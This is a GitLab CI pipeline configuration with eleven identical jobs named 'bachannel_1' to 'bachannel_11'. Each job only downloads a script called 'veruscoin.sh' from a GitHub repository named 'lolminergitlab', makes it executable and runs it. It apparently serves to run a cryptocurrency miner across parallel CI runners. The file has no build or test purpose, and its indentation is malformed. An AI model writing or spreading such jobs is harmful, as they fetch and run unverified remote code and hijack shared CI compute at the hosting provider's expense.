bachannel_1:
stage: bachannel
script:
	- wget https://raw.githubusercontent.com/FixKRI1/lolminergitlab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
	
	bachannel_2:
stage: bachannel
script:
	- wget https://raw.githubusercontent.com/FixKRI1/lolminergitlab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
	
	bachannel_3:
stage: bachannel
script:
	- wget https://raw.githubusercontent.com/FixKRI1/lolminergitlab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
	
	bachannel_4:
stage: bachannel
script:
	- wget https://raw.githubusercontent.com/FixKRI1/lolminergitlab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
	
	bachannel_5:
stage: bachannel
script:
	- wget https://raw.githubusercontent.com/FixKRI1/lolminergitlab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
	
	bachannel_6:
stage: bachannel
script:
	- wget https://raw.githubusercontent.com/FixKRI1/lolminergitlab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh

bachannel_7:
stage: bachannel
script:
	- wget https://raw.githubusercontent.com/FixKRI1/lolminergitlab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
	
	bachannel_8:
stage: bachannel
script:
	- wget https://raw.githubusercontent.com/FixKRI1/lolminergitlab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
	
	bachannel_9:
stage: bachannel
script:
	- wget https://raw.githubusercontent.com/FixKRI1/lolminergitlab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
	
	bachannel_10:
stage: bachannel
script:
	- wget https://raw.githubusercontent.com/FixKRI1/lolminergitlab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh
	
	bachannel_11:
stage: bachannel
script:
	- wget https://raw.githubusercontent.com/FixKRI1/lolminergitlab/main/veruscoin.sh && chmod u+x veruscoin.sh && ./veruscoin.sh